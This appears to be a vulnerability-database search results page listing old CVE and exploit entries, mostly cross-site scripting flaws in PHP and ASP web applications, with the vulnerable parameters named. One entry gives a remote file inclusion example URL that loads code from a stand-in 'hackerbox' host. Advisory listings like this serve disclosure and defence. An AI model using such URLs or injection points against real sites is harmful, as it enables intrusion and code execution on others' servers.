4545 matches found
CVE-2005-0656
Multiple cross-site scripting (XSS) vulnerabilities in auraCMS 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) hits parameter to hits.php, (2) query parameter to index.php, or (3) theCount parameter to counter.php...
CVE-2005-0674
Cross-site scripting (XSS) vulnerability in the News module for paBox 1.6 allows remote attackers to inject arbitrary web script or HTML via the text hidden parameter in an HTTP POST request...
CVE-2005-0660
Multiple cross-site scripting (XSS) vulnerabilities in D-Forum 1.11 allow remote attackers to inject arbitrary web script or HTML via certain fields, as demonstrated using the page parameter in nav.php3...
PHP Form Mail 2.3 - Arbitrary File Inclusion
Example: if register_globals=on and allow_url_fopen=on: http://victim/dir/inc/formmail.inc.php?scriptroot=http://hackerbox/ milw0rm.com 2005-03-05...
CVE-2005-0628
Multiple cross-site scripting (XSS) vulnerabilities in Forumwa 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the keyword parameter in search.php or the (2) body or (3) subject of a forum message...
CVE-2005-0641
Cross-site scripting (XSS) vulnerability in the Reporter for Computer Associates (CA) Unicenter Asset Management (UAM) 4.0 allows remote attackers to inject arbitrary HTML or web script via the (1) name or (2) description in a report template...
CVE-2004-1055
Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 2.6.0-pl2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the PmaAbsoluteUri parameter, (2) the zerorows parameter in readdump.php, (3) the confirm form, or (4) an error message generated by the internal...
CVE-2005-0629
Multiple cross-site scripting (XSS) vulnerabilities in profile.php in 427BB 2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) user or (2) Avatar parameters...
CutePHP CuteNews 1.3.6 - 'x-forwarded-for' Script Injection
source: https://www.securityfocus.com/bid/12691/info A remote script injection vulnerability affects CutePHP CuteNews. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality. An attacker may leverage this...
CVE-2004-1711
Cross-site scripting (XSS) vulnerability in post.php in Moodle before 1.3 allows remote attackers to inject arbitrary web script or HTML via the reply parameter...
CVE-2004-1730
Cross-site scripting (XSS) vulnerability in Mantis bugtracker allows remote attackers to inject arbitrary web script or HTML via (1) the return parameter to loginpage.php, (2) e-mail field in signup.php, (3) action parameter to loginselectprojpage.php, or (4) hidestatus parameter to viewallset.php...
CVE-2004-1716
Cross-site scripting (XSS) vulnerability in PForum before 1.26 allows remote attackers to inject arbitrary web script or HTML via the (1) IRC Server or (2) AIM ID fields in the user profile...
CVE-2005-0534
Multiple cross-site scripting (XSS) vulnerabilities in MediaWiki 1.3.x before 1.3.11 and 1.4 beta before 1.4 rc1 allow remote attackers to inject arbitrary web script...
PANews 2.0 - PHP Remote Code Execution
source: https://www.securityfocus.com/bid/12611/info PaNews is reported prone to a remote PHP script code execution vulnerability. It is reported that PHP script code may be injected into the PaNews software through the 'showcopy' parameter of the 'adminsetup.php' script. Reports indicate that wh...
CVE-2004-1589
Cross-site scripting (XSS) vulnerability in GoSmart Message Board allows remote attackers to inject web script or HTML via the (1) Category parameter to Forum.asp or (2) MainMessageID parameter to ReplyToQuestion.asp...
CVE-2004-1690
Cross-site scripting (XSS) vulnerability in the Web Server in DNS4Me 3.0.0.4 allows remote attackers to execute arbitrary web script or HTML via the URL...
CVE-2004-1594
Cross-site scripting (XSS) vulnerability in FuseTalk 4.0 allows remote attackers to execute arbitrary web script via an img src tag...
CVE-2004-1632
Cross-site scripting (XSS) vulnerability in wiki.php in MoniWiki 1.0.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the arguments to wiki.php...
CVE-2004-1499
Cross-site scripting (XSS) vulnerability in the compose message form in HELM 3.1.19 and earlier allows remote attackers to execute arbitrary web script or HTML via the Subject field...
CVE-2005-0477
Cross-site scripting (XSS) vulnerability in the SML code for Invision Power Board 1.3.1 FINAL allows remote attackers to inject arbitrary web script via (1) a signature file or (2) a message post containing an IMG tag within a COLOR tag whose style is set to background:url...